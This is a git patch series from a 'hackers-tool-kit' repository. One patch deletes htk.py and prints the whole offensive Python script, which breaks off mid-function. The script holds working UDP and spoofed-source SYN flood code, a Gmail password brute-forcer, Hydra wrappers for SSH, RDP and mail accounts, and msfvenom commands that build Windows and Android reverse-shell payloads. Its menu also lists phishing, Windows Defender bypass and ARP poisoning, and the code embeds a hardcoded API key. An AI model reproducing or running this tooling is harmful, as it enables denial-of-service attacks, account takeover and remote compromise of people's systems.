Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Sun, 17 Mar 2019 20:38:05 +0100 Subject: [PATCH 037/214] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index c0a7a7d..8a63865 100644 --- a/README.md +++ b/README.md @@ -3,7 +3,7 @@ Its a framework filled with alot of options and hacking tools you use directly i from brute forcing to payload making im still adding more stuff to see updates check on my instagram @unkn0wn_bali -![](tools/screenshot.png) +![](tools/screenshot1.png) ![](tools/screenshot2.png) From 8edc5dbad36d20c107e98be3553415f3019e8cf2 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Sun, 17 Mar 2019 22:42:13 +0100 Subject: [PATCH 038/214] Delete htk.py --- htk.py | 1994 -------------------------------------------------------- 1 file changed, 1994 deletions(-) delete mode 100644 htk.py diff --git a/htk.py b/htk.py deleted file mode 100644 index 4e1d852..0000000 --- a/htk.py +++ /dev/null @@ -1,1994 +0,0 @@ -#!/usr/local/bin/python -# coding: latin-1 -#if you use this code give me credit @unkn0wn_bali -#i do not give you permission to edit this script without my credit -import os -print "Starting hackers-tool-kit... [ * ]-[0%]" -import platform -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[5%]" -import webbrowser -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[9%]" -import hashlib -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[14%]" -import subprocess -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[19%]" -import zipfile -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[23%]" -import colorama -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[25%]" -from modules import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[26%]" -import modules.colors -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[27%]" -import builtwith -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[29%]" -from urllib2 import urlopen -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[31%]" -from urllib2 import URLError -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[34%]" -from urllib2 import HTTPError -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[38%]" -from urllib import urlencode -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[39%]" -from plugins.DNSDumpsterAPI import DNSDumpsterAPI -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[41%]" -import whois -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[45%]" -import json -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[47%]" -from urlparse import urlparse -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[50%]" -from re import search, sub -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[55%]" -import cookielib -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[56%]" -import socket -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[59%]" -from scapy.all import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[60%]" -from threading import Thread, active_count -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[63%]" -import random -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[67%]" -import string -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[70%]" -import signal -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[73%]" -import ssl -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[79%]" -import argparse -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[83%]" -import sys -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[86%]" -import socks -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[89%]" -import mechanize -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[90%]" -import requests -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[94%]" -import time -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[96%]" -from datetime import datetime -now = datetime.now() -hour = now.hour -minute = now.minute -day = now.day -month = now.month -year = now.year -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[99%]" -sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) -Gb = random._urandom(20000) -bytes = random._urandom(20000) -Kb = random._urandom(20000) -r = '\033[31m' -W = '\033[90m' -R = '\033[91m' -N = '\033[0m' -G = '\033[92m' -B = '\033[94m' -Y = '\033[93m' -LB = '\033[1;36m' -P = '\033[95m' -Bl = '\033[30m' -O = '\033[33m' -p = '\033[35m' -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" -os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @unkn0wn_bali\a'") -os.system("service tor start") -os.system("service postgresql start") -os.system("clear") -def mainbanner(): - os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") - print N+"""\033[34m - .............. \033[0mtype ? for help\033[34m - ..,;:ccc,. - ......''';lxO. - .....''''..........,:ld; - .';;;:::;,,.x, - ..'''. 0Xxoc:,. ... - .... ,ONkc;,;cokOdc',. - . OMo ':ddo. - dMc :OO; - 0M. .:o. - ;Wd - ;XO, \033[93mCreated By @unkn0wn_bali On Instagram\033[34m - ,d0Odlc;,.. - ..',;:cdOOd::,. - .:d;.':;. - 'd, .' - ;l .. - .o - c - .' - .\033[92m - ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ - ██ ██ ▀▀▀██▀▀▀ ██ ██▀ - ██ ██ ██ ██▄██ - ████████ ██ █████ - ██ ██ █████ ██ █████ ██ ██▄ - ██ ██ ██ ██ ██▄ - ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m - ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ - ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ - ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - """.decode('utf-8') -def help(): - print B+""" -▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ - ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ - ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ -\033[0m ░ -? : displays this message -clear : clears screen except for banner -exit : exits script -restart : re run hackers-tool-kit -rebootl : reboot whole device -winload : windows reverse_tcp payload -andload : android reverse_tcp payload -command : execute terminal command -msfcon : metasploit console -set : setoolkit console -msfven : msfvenom -gmail : gmail bruteforce -insta : instagram bruteforce -fb : facebook bruteforce -hydra : Black-Hydra bruteforce -medusa : Medusa bruteforce -ipgrab : host to ip address -myip : show your ip -wifite : automated wifi hacker -reaver : reaver automated [ wifi hack ] -mon : put device in monitor mode -monoff : put device out of monitor mode -netdev : find all devices in your network -scannet : scan for networks around you -specnet : scan a specific network -port : scan for ports on a host -info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m -sysinfo : info about your system \033[91m ██ ██\033[0m -msfex : shows all metasploit exploits \033[91m ██ ██\033[0m -msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfall : shows all metasploit modules \033[91m ██ ██\033[0m -udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m -tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m -syn : SYN flood / dos \033[91m █ █\033[0m -slowl : Slow Loris dos \033[91m █ █ \033[0m -ping : pings host \033[91m █ █\033[0m -multih : start a multi handler \033[91m █ █\033[0m -cupp : make wordlists \/ vvvvvvvvv \/ -vdir : view files of a directory -vpn : activate a vpn TIP: "ctrl c" usually stops a script if you dont want to keep running it -vpnoff : stop vpn -pidox : dox website -pingen : Generate a routers default pin -deauth : deauth attack / wifi jammer -macc : changes mac address -macoff : returns mac address to normal -arppois : ARP poisoning -sslscan : ssl scan a host -payload : make a metasploit payload of your choice -crunch : Make wordlists -traff : shows your internet traffic -resa : reset account password -resu : reset unix password -hashid : find the type of hash of a hash -wafwoof : check a web application for firewall -cloud : cloudflare bypass -brutex : auto bruteforce every service of a host -methelp : show meterpreter help -winbyp : windows defender bypass -exploit : use a metasploit exploit of your choice -phish : phishing automated -datalist: list all hosts & services in the database -msfev : shows all metasploit evasions -upgrade : fully update your linux os -nscript : use a nmap script -sshver : scan for ssh version on a host -\033[91m---------------------------------------------------------------------------------\033[0m - """ -def winload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -def andload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -def gmail(): - #!/usr/bin/python - '''create by Ha3MrX''' - - import smtplib - from os import system - - def main(): - print '\033[93m=================================================' - print '\033[91m create by Ha3MrX ' - print '\033[93m=================================================' - print '\033[95m ++++++++++++++++++++ ' - print '\n ' - print '\033[92m _,. ' - print ' ' - print ' ' - print ' HA3MrX ' - print ' _,. ' - print ' ,` -.) ' - print ' ( _/-\\-._ ' - print ' /,|`--._,-^| , ' - print ' \_| |`-._/|| , | ' - print ' | `-, / | / / ' - print ' | || | / / ' - print ' `r-._||/ __ / / ' - print ' __,-<_ )`-/ `./ / ' - print ' \ `--- \ / / / ' - print ' | |./ / ' - print ' / // / ' - print ' \_/ \ |/ / ' - print ' | | _,^- / / ' - print ' | , `` (\/ /_ ' - print ' \,.->._ \X-=/^ ' - print ' ( / `-._//^` ' - print ' `Y-.____(__} ' - print ' | {__) ' - print ' () \033[91m V.1.0 ' - - main() - print '\033[0m[1] start the attack' - print '[2] exit' - option = input('==>') - if option == 1: - file_path = raw_input('path of passwords file :') - else: - system('clear') - exit() - pass_file = open(file_path,'r') - pass_list = pass_file.readlines() - def login(): - i = 0 - user_name = raw_input('target email :') - server = smtplib.SMTP_SSL('smtp.gmail.com', 465) - server.ehlo() - for password in pass_list: - i = i + 1 - print str(i) + '/' + str(len(pass_list)) - try: - server.login(user_name, password) - system('clear') - main() - print '\n' - print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' - break - except smtplib.SMTPAuthenticationError as e: - error = str(e) - if error[14] == '<': - system('clear') - main() - print '[+] this account has been hacked, password :' + password + ' ^_^' - - break - else: - print '[!] password not found => ' + password - login() -def port(): - n = raw_input("Enter Target: ") - os.system("nmap " + n) -def insta(): - insta = raw_input("USERNAME> ") - jl = raw_input("WORDLIST> ") - k = raw_input("THREADS> ") - ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) - os.system(ma) -def fb(): - facebook = raw_input("[EMAIL/ID->]: ") - word = raw_input("[WORDLIST->]: ") - ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) - os.system(ks) -def ipgrab(): - b = raw_input(Y+'Enter Host:\033[0m ') - ip = socket.gethostbyname(b) - print G+"------------------------\033[0m" - print N+"Host: ", b - print N+"IP: ", ip - print G+"------------------------\033[0m" -def myip(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) -def wifite(): - os.system("wifite") -def mon(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng start " + i) -def netdev(): - os.system("netdiscover") -def scannet(): - os.system("iwconfig") - m = raw_input("Select Interface: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - os.system("airodump-ng -w /root/SCAN " + m) - print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" - if j == "n": - os.system("airodump-ng " + m) -def info(): - params = [] - # Browser - br = mechanize.Browser() - - # Just some colors and shit - white = '\033[1;97m' - green = '\033[1;32m' - red = '\033[1;31m' - yellow = '\033[1;33m' - end = '\033[1;m' - info = '\033[1;33m[!]\033[1;m' - que = '\033[1;34m[?]\033[1;m' - bad = '\033[1;31m[-]\033[1;m' - good = '\033[1;32m[+]\033[1;m' - run = '\033[1;97m[~]\033[1;m' - - # Cookie Jar - cj = cookielib.LWPCookieJar() - br.set_cookiejar(cj) - - # Browser options - br.set_handle_equiv(True) - br.set_handle_redirect(True) - br.set_handle_referer(True) - br.set_handle_robots(False) - - # Follows refresh 0 but not hangs on refresh > 0 - br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) - br.addheaders = [ - ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] - - - print '''\033[1;31m - _________ __ __ __ - / _____// |________|__| | __ ___________ - \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ - / \| | | | \/ | <\ ___/| | \/ - /_______ /|__| |__| |__|__|_ \\\\___ >__| - \/ \/ \/\033[1;m''' - target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') - if 'http' in target: - parsed_uri = urlparse(target) - domain = '{uri.netloc}'.format(uri=parsed_uri) - else: - domain = target - try: - br.open('http://' + target) - target = 'http://' + target - except: - target = 'https://' + target - - def sqli(url): - print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run - br.open('https://suip.biz/?act=sqlmap') - br.select_form(nr=0) - br.form['url'] = url - req = br.submit() - result = req.read() - match = search(r"---(?s).*---", result) - if match: - print '%s One or more parameters are vulnerable to SQL injection' % good - option = raw_input( - '%s Would you like to see the whole report? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - print '\033[1;31m-\033[1;m' * 40 - print match.group().split('---')[1][:-3] - print '\033[1;31m-\033[1;m' * 40 - else: - print '%s None of parameters is vulnerable to SQL injection' % bad - - - def cms(domain): - try: - result = br.open('https://whatcms.org/?s=' + domain).read() - detect = search(r'class="nowrap" title="[^<]*">', result) - WordPress = False - try: - r = br.open(target + '/robots.txt').read() - if "wp-admin" in str(r): - WordPress = True - except: - pass - if detect: - print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) - detect = detect.group().split('">')[1][:-27] - if 'WordPress' in detect: - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - elif WordPress: - print '%s CMS Detected : WordPress' % info - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - else: - print '%s %s doesn\'t seem to use a CMS' % (info, domain) - except: - pass - - def honeypot(ip_addr): - result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} - honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr - try: - phoney = br.open(honey).read() - if float(phoney) >= 0.0 and float(phoney) <= 0.4: - what = good - else: - what = bad - print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) - except KeyError: - print '\033[1;31m[-]\033[1;m Honeypot prediction failed' - - def whoisIt(url): - who = "" - print '{} Trying to gather whois information for {}'.format(run,url) - try: - who = str(whois.whois(url)).decode() - except Exception: - pass - test = who.lower() - if "whoisguard" in test or "protection" in test or "protected" in test: - print '{} Whois Protection Enabled{}'.format(bad, end) - else: - print '{} Whois information found{}'.format(good, end) - try: - data = json.loads(who) - for key in data.keys(): - print "{} :".format(key.replace("_", " ").title()), - if type(data[key]) == list: - print ", ".join(data[key]) - else: - print "{}".format(data[key]) - except ValueError: - print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) - pass - - def nmap(ip_addr): - port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr - result = br.open(port).read() - result = sub(r'Starting[^<]*\)\.', '', result) - result = sub(r'Service[^<]*seconds', '', result) - result = os.linesep.join([s for s in result.splitlines() if s]) - print result - - def bypass(domain): - post = urlencode({'cfS': domain}) - result = br.open( - 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() - - match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) - if match: - bypass.ip_addr = match.group().split(' ')[1][:-1] - print '%s Real IP Address : %s' % (good, bypass.ip_addr) - - def dnsdump(domain): - res = DNSDumpsterAPI(False).search(domain) - print '\n%s DNS Records' % good - for entry in res['dns_records']['dns']: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - for entry in res['dns_records']['mx']: - print '\n%s MX Records' % good - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n\033[1;32m[+]\033[1;m Host Records (A)' - for entry in res['dns_records']['host']: - if entry['reverse_dns']: - print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) - else: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n%s TXT Records' % good - for entry in res['dns_records']['txt']: - print entry - print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) - - - def fingerprint(ip_addr): - try: - result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() - match = search(r'"os_description": "[^<]*"', result) - if match: - print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) - except: - pass - - - ip_addr = socket.gethostbyname(domain) - print '%s IP Address : %s' % (info, ip_addr) - try: - r = requests.get(target) - header = r.headers['Server'] - if 'cloudflare' in header: - print '%s Cloudflare detected' % bad - bypass(domain) - try: - ip_addr = bypass.ip_addr - except: - pass - else: - print '%s Server: %s' % (info, header) - try: - print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) - except: - pass - try: - r.headers['X-Frame-Options'] - except: - print '%s Clickjacking protection is not in place.' % good - except: - pass - fingerprint(ip_addr) - cms(domain) - try: - honeypot(ip_addr) - except: - pass - print "{}----------------------------------------{}".format(red, end) - whoisIt(domain) - try: - r = br.open(target + '/robots.txt').read() - print '\033[1;31m-\033[1;m' * 40 - print '%s Robots.txt retrieved\n' % good, r - except: - pass - print '\033[1;31m-\033[1;m' * 40 - nmap(ip_addr) - print '\033[1;31m-\033[1;m' * 40 - dnsdump(domain) - os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) - try: - br.open(target) - print '%s Crawling the target for fuzzable URLs' % run - for link in br.links(): - if 'http' in link.url or '=' not in link.url: - pass - else: - url = target + '/' + link.url - params.append(url) - if len(params) == 0: - print '%s No fuzzable URLs found' % bad - quit() - print '%s Found %i fuzzable URLs' % (good, len(params)) - for url in params: - print url - sqli(url) - url = url.replace('=', '') - r = br.open(url).read() - if '' in r: - print '%s One or more parameters are vulnerable to XSS' % good - break - print '%s These are the URLs having parameters:' % good - for url in params: - print url - except: - pass -def sysinfo(): - os.system("ifconfig") - os.system("iwconfig") - os.system("neofetch") - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) -def msfex(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show exploits'""") -def udp(): - target = raw_input(N+"Target:\033[91m ") - ip = socket.gethostbyname(target) - port = input(N+"Port:\033[91m ") - os.system("service tor restart") - print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) - os.system("sleep 2s") - sent = 0 - print "KILLING %s CONNECTIONS"%(ip) - while True: - sock.sendto(Gb, (ip,port)) - sock.sendto(bytes, (ip,port)) - sock.sendto(Kb, (ip,port)) - sent = sent + 1 - port = port + 1 - print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) - if port == 65534: - port = 1 -def tcp(): - print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" - print "\n" - tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") - print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" - os.system("sleep 5") - os.system("python /root/hackers-tool-kit/tools/" + tcp) -def syn(): - def randomIP(): - ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) - return ip - - def randInt(): - x = random.randint(1000,9000) - return x - - def SYN_Flood(dstIP,dstPort,counter): - total = 0 - print "Packets are sending ..." - for x in range (0,counter): - s_port = randInt() - s_eq = randInt() - w_indow = randInt() - - IP_Packet = IP () - IP_Packet.src = randomIP() - IP_Packet.dst = dstIP - - TCP_Packet = TCP () - TCP_Packet.sport = s_port - TCP_Packet.dport = dstPort - TCP_Packet.flags = "S" - TCP_Packet.seq = s_eq - TCP_Packet.window = w_indow - - send(IP_Packet/TCP_Packet, verbose=0) - total+=1 - sys.stdout.write("\nTotal packets sent: %i\n" % total) - - - def info(): - - dstIP = raw_input ("\nTarget IP : ") - dstPort = input ("Target Port : ") - - return dstIP,int(dstPort) - - - def main(): - dstIP,dstPort = info() - counter = input ("Packets : ") - SYN_Flood(dstIP,dstPort,int(counter)) - - main() - -def ping(): - p = raw_input("Enter Host: ") - os.system("ping " + p) -def msfpa(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show payloads'""") -def msfau(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show auxiliary'""") -def multih(): - os.system("service postgresql start") - os.system("""msfconsole -x 'use multi/handler'""") -def msfall(): - os.system("service postgresql start") - os.sytem("""msfconsole -x 'show all'""") -def hydra(): - """ - This program is just a small program to shorten brute force sessions on hydra :) - But to be more satisfying results of the brute force. You better interact directly with hydra, - without having to use this black hydra console first: '). - If you find any errors in running our program. Can chat via facebook :). - Hydra is needed for the process of this program :). - """ - import sys, os, time - - # Restart #################### - def restart_program(): - python = sys.executable - os.execl(python, python, * sys.argv) - curdir = os.getcwd() - ############################## - - os.system("clear") - print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" - print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" - print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" - print G+"-----------------------------------------------------" - print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" - print R+" [*] Author: DedSecTL --- [*] Version 1.0" - print N+"c=={:::::::::::::::> Black Hydra Console" - print R+" [*] My FB : https://m.facebook.com/100004136748473" - print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" - print - print " ===|[ Brute Force ]|===" - print - print " [01] Cisco Brute Force " - print " [02] VNC Brute Force " - print " [03] FTP Brute Force " - print " [04] Gmail Brute Force " - print " [05] SSH Brute Force " - print " [06] TeamSpeak Brute Force " - print " [07] Telnet Brute Force " - print " [08] Yahoo Mail Brute Force " - print " [09] Hotmail Brute Force " - print " [10] Router Speedy Brute Force " - print " [11] RDP Brute Force " - print " [12] MySQL Brute Force " - print - print " [00] Exit" - print - bhydra = raw_input("[*] B-Hydra > ") - - if bhydra == '01' or bhydra == '1': - print - print " +---------------------------+" - print " | Cisco Brute Force |" - print " +---------------------------+" - print - print - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -P %s %s cisco" % (word, iphost)) - sys.exit() - - elif bhydra == '02' or bhydra == '2': - print - print " +---------------------------+" - print " | VNC Brute Force |" - print " +---------------------------+" - print - print - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) - iphost = raw_input("[*] IP/Hostname : ") - - elif bhydra == '03' or bhydra == '3': - print - print " +------------------------------+" - print " | FTP Brute Force |" - print " +------------------------------+" - print - print - user = raw_input("[*] User : ") - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '04' or bhydra == '4': - print - print " +------------------------------+" - print " | Gmail Brute Force |" - print " +------------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '05' or bhydra == '5': - print - print " +--------------------------------+" - print " | SSH Brute Force |" - print " +--------------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) - sys.exit() - - elif bhydra == '06' or bhydra == '6': - print - print " +-------------------------+" - print " | TeamSpeak Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) - sys.exit() - - elif bhydra == '07' or bhydra == '7': - print - print " +-------------------------+" - print " | Telnet Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) - sys.exit() - - elif bhydra == '08' or bhydra == '8': - print - print " +---------------------------+" - print " | Yahoo Brute Force |" - print " +---------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '09' or bhydra == '9': - print - print " +----------------------------+" - print " | Hotmail Brute Force |" - print " +----------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '10': - print - print " +-----------------------------+" - print " | Router Speedy Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) - sys.exit() - - elif bhydra == '11': - print - print " +----------------------------+" - print " | RDP Brute Force |" - print " +----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '12': - print - print " +-----------------------------+" - print " | MySQL Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) - - elif bhydra == '00' or bhydra == '0': - print "\n[!] Exit the Program..." - sys.exit() - - else: - print "\n[!] ERROR : Wrong Input" - time.sleep(1) - restart_program() -def cupp(): - os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") - print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" -def vdir(): - print "\n" - os.system("ls") - print Y+"! doesnt have to be these can be any directory !\033[0m" - print "\n" - h = raw_input("Directory Path: ") - print "\n" - print "--------------------------------------------------------------------------------------------------------------------------------------------" - os.system("ls " + h) - print "--------------------------------------------------------------------------------------------------------------------------------------------" - -def monoff(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng stop " + i) -def vpn(): - os.system("anonsurf start") - os.system("anonsurf myip") -def vpnoff(): - os.system("anonsurf stop") - os.system("anonsurf myip") -def slowl(): - de = raw_input("Delay: ") - tar = raw_input("RHOST: ") - port = raw_input("RPORT: ") - soc = raw_input("Sockets: ") - os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') - os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) - os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) - os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) - os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) - os.system('echo "run\n" >> slowl.rc') - os.system('msfconsole -r slowl.rc') - os.system('rm -rf slowl.rc') - -def pidox(): - print Y+"! USING FIREFOX !\033[0m" - os.system("sleep 2") - os.system("firefox https://pipl.com/") -def specnet(): - jk = 